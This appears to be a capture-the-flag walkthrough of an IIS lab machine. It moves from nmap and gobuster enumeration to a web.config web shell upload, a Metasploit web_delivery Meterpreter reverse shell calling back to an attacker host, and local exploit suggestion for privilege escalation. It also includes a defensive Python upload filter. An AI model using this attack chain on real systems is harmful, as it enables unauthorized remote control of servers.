Difficulty: Easy
Machine Creator: mrb3n
Tools Used: NMAP, Gobuster, Metasploit
Task: To find User.txt and Root.txt
Network Enumeration
Let’s start with a simple NMAP scan to discover open ports and services.
nmap -A 10.10.10.93


GoBuster
Using Gobuster, we can perform a directory scan. The host is a Windows IIS server, so we add the extensions .aspx and .html.
gobuster -u http://10.10.10.93 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html



Remote Code Execution (RCE)



Webshell
Since we can upload a web.config file, we should be able to upload a web shell in the config file.
https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
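The root cause on this box is an upload feature that accepts a web.config file. The following server-side filename check would refuse it; it is an added example, not part of the original write-up, and the image-only allowlist and the function names are assumptions.

```python
import os
import re
import uuid

# Assumption: the application only needs to accept these image types.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Names IIS treats as configuration are refused outright, before the allowlist.
BLOCKED_NAMES = {"web.config", "applicationhost.config"}


def normalise(filename: str) -> str:
    """Reduce a client-supplied name to what Windows would actually create."""
    # Keep only the last path component, for both separator styles.
    name = re.split(r"[\\/]", filename)[-1]
    # Drop an NTFS alternate data stream suffix such as "::$DATA".
    name = name.split(":", 1)[0]
    # Win32 strips trailing dots and spaces when it creates a file.
    name = name.rstrip(". ")
    # NTFS names are case-insensitive, so compare in lower case.
    return name.lower()


def safe_upload_name(filename: str):
    """Return a server-generated storage name, or None if the upload is refused."""
    name = normalise(filename)
    if not name or name in BLOCKED_NAMES:
        return None
    ext = os.path.splitext(name)[1]
    if ext not in ALLOWED_EXTENSIONS:
        return None
    # Never reuse the client's name on disk: store under a random name.
    return uuid.uuid4().hex + ext


if __name__ == "__main__":
    # Constructed sample names, not taken from the target.
    for sample in ["photo.jpg", "web.config", "WEB.CONFIG. ", "page.aspx"]:
        print(repr(sample), "->", safe_upload_name(sample))
```

Storing uploads outside the web root, or in a directory where IIS has script execution and configuration overrides disabled, complements this check.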


Web Delivery Meterpreter Shell
We need to build our exploit from Metasploit using the web delivery script.
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.2
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.2
msf exploit(multi/script/web_delivery) > run

Meterpreter Shell

User.txt

Privilege Escalation
Now we need a SYSTEM-level session to get root.txt. We can use the local_exploit_suggester recon module in Metasploit.
msf > use post/multi/recon/local_exploit_suggester
msf > set session 2
msf > run

Privilege Escalation Exploit


Root.txt
